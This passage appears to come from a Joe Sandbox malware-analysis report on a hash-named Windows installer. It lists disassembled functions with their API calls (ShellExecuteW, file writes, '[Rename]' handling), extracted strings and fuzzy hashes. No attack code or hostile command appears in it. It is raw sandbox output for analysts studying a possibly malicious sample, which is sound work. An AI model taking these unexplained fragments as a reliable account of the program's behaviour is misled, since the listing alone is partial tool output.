Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B48
Part of subcall function 00403B31: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00403C8A,?), ref: 00403B57
Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B6B

GetDlgItem.USER32(?,0000040A), ref: 00403DB2
SendMessageW.USER32(00000000), ref: 00403DB9
GetDlgItem.USER32(?,000003E8), ref: 00403DE4
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403E27
LoadCursorW.USER32(00000000,00007F02), ref: 00403E35
SetCursor.USER32(00000000), ref: 00403E38
ShellExecuteW.SHELL32(0000070B,open,0046B220,00000000,00000000,00000001), ref: 00403E4D
LoadCursorW.USER32(00000000,00007F00), ref: 00403E59
SetCursor.USER32(00000000), ref: 00403E5C
SendMessageW.USER32(00000111,00000001,00000000), ref: 00403E8B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00403E9D

Strings

22571808, xrefs: 00403E0D
N, xrefs: 00403DD2
open, xrefs: 00403E45

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: 22571808$N$open
API String ID: 3928313111-3600904172
Opcode ID: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
Instruction ID: ed57efd37533f930562fe34da2b72c8113efd27b5b8a5cb1164b605c320215f3
Opcode Fuzzy Hash: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
Instruction Fuzzy Hash: A87181B1900609BFDB109F24DD89A6A7F7CFB04306F00813AF605B62E1C7789A51CF99

Function 0040635B Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00463E20,NUL), ref: 0040636B
CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000), ref: 0040638A
GetShortPathNameW.KERNEL32(00000000,00463E20,00000400), ref: 00406393

Part of subcall function 00405864: lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
Part of subcall function 00405864: lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6

GetShortPathNameW.KERNEL32(Ne@,00469478,00000400), ref: 004063B4
WideCharToMultiByte.KERNEL32(00000000,00000000,00463E20,000000FF,00464620,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063DD
WideCharToMultiByte.KERNEL32(00000000,00000000,00469478,000000FF,00464C70,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063F5
wsprintfA.USER32 ref: 0040640F
GetFileSize.KERNEL32(00000000,00000000,00469478,C0000000,00000004,00469478,?), ref: 00406447
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406456
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406472
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004064A2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00465070,00000000,-0000000A,004089A0,00000000,[Rename]), ref: 004064F5

Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406509
GlobalFree.KERNEL32(00000000), ref: 00406510
CloseHandle.KERNEL32(?), ref: 0040651A

Strings

pLF, xrefs: 004063EA
%s=%s, xrefs: 00406405
>F, xrefs: 00406365
[Rename], xrefs: 0040648A, 00406499
NUL, xrefs: 00406360
Ne@, xrefs: 004063B0

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: >F$%s=%s$NUL$Ne@$[Rename]$pLF
API String ID: 565278875-2487742289
Opcode ID: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
Instruction ID: ec96de5c0a89ca25b54bc76a1f58c05e631165e395b03bcecce623a0c26120a0
Opcode Fuzzy Hash: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
Instruction Fuzzy Hash: C2412A32105209BFC6202B61EE48E2F3E5CDF86758B16453EF546F22D1DE3D98158ABE

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,004732A0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
Instruction ID: 5d70bd818855421fa823bf0ed1b165e0401977292747d9ede3c4f118d7b178ba
Opcode Fuzzy Hash: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
Instruction Fuzzy Hash: BB515A71400209AFCF058F95DE459AF7FB9EF44311F04802AF992AA1A0CB38DA55DFA4

Function 004060CA Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 218stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B
GetSystemDirectoryW.KERNEL32(22571808,00002004), ref: 0040621D

Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5

Part of subcall function 004060CA: SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040626C
Part of subcall function 004060CA: SHGetPathFromIDListW.SHELL32(?,22571808), ref: 0040627A
Part of subcall function 004060CA: CoTaskMemFree.OLE32(?), ref: 00406285

GetWindowsDirectoryW.KERNEL32(22571808,00002004), ref: 00406230
lstrcatW.KERNEL32(22571808,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AA
lstrlenW.KERNEL32(22571808,00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040630C

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004062A4
Software\Microsoft\Windows\CurrentVersion, xrefs: 004061EB
22571808, xrefs: 004060F1, 004061DD, 004061E3, 00406207, 0040621C, 0040622F, 0040624B, 00406276, 004062A9, 004062C8, 004062DD, 004062DE, 004062EC, 00406305, 0040630B, 00406318, 0040634E

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrcpynlstrlen
String ID: 22571808$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3935908587-13519471
Opcode ID: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
Instruction ID: faf527bbbd80b2f6d96589bc921f5814a8c68153425bf04786751db3c9b8505d
Opcode Fuzzy Hash: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
Instruction Fuzzy Hash: A2711531900215AADF20AF68CC4467E33B4EB55314F12817FE947BA2E1D73D89A2CB9D

Function 00403952 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040396C
GetSysColor.USER32(00000000), ref: 00403988
SetTextColor.GDI32(?,00000000), ref: 00403994
SetBkMode.GDI32(?,?), ref: 004039A0
GetSysColor.USER32(?), ref: 004039B3
SetBkColor.GDI32(?,?), ref: 004039C3
DeleteObject.GDI32(?), ref: 004039DD
CreateBrushIndirect.GDI32(?), ref: 004039E7

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
Instruction ID: fd505c26376d0b004dab163c32b6598f7c3f39bfa23b8c101552dd0b32be6230
Opcode Fuzzy Hash: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
Instruction Fuzzy Hash: 931166B15007446BC7219F68DE08B5BBFFCAF05715F05892DF886E22A0D774DA48CB54

Function 00402A2F Relevance: 10.6, APIs: 7, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402A83
GlobalAlloc.KERNEL32(00000040,?,00000000,?,00000000), ref: 00402AA0
GlobalFree.KERNEL32(?), ref: 00402AD7
WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00402AEB
GlobalFree.KERNEL32(00000000), ref: 00402AF2
CloseHandle.KERNEL32(?), ref: 00402B09
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402B1C

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
Instruction ID: 9e4a56611826f2756eb4244239c06745681650eb98283bcdfa384ecb69a0f049
Opcode Fuzzy Hash: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
Instruction Fuzzy Hash: 13219832D00114BBCB216FA5DE49E9F7F79DF49724F10423AF925761E1CB7848119BA8

Function 00404A73 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E

Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
Instruction ID: 484fc1ca55a69b1daf8ef76b765ed66def062ae06368be70f68da4f473989c37
Opcode Fuzzy Hash: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
Instruction Fuzzy Hash: A221B3B1900518BADF119F65DC84E9EBFB9FF84314F10413AFA04B22A0C7788A80DF58

Function 00405AE7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004E00C8,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B4A
CharNextW.USER32(?,?,?,00000000), ref: 00405B59
CharNextW.USER32(?,004E00C8,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B5E
CharPrevW.USER32(?,?,"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe",004E00C8,00000000,0040336C,004E00C8,00000002,0040359B), ref: 00405B72

Strings

"C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe", xrefs: 00405AF1
*?|<>/":, xrefs: 00405B39

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.exe"$*?|<>/":
API String ID: 589700163-939116114
Opcode ID: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
Instruction ID: 31febb90154ecf465c6c3fd58460301c566faf6ecd06643fefb4dc305e878468
Opcode Fuzzy Hash: b7b5818da4b4a2654bbca5167226ce5d18b2b6f4b0368041995d2741e331b462
Instruction Fuzzy Hash: B9118E15810A1599CB30BB298840E7BB7F8EE95750750853FED85B32C1E778BC81CABD

Function 0040434F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040436A
GetMessagePos.USER32 ref: 00404372
ScreenToClient.USER32(?,?), ref: 0040438A
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040439C
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004043C2

Strings

f, xrefs: 0040439E

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004D8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.00000000004E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651839232.0000000000518000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_e6db7d34b498982601b2c45ac5b2a1c1b9502e502514c.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
Instruction ID: 785f0416c38af9d8ad27fcbae1db7caa358ffe27c450e4d5cf04d3572e5fe4cd
Opcode Fuzzy Hash: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
Instruction Fuzzy Hash: B0017171A4021DBAEB00DBA4DD85FEEBBBCAF55714F10012BFB50B61D0C7B49A418B65

Function 00402DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD2
MulDiv.KERNEL32(00029400,00000064,00159690), ref: 00402DFD
wsprintfW.USER32 ref: 00402E0D
SetWindowTextW.USER32(?,?), ref: 00402E1D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E2F

Strings

verifying installer: %d%%, xrefs: 00402E07

Memory Dump Source

Source File: 00000000.00000002.1651586398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1651097527.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651606542.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1651627890.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
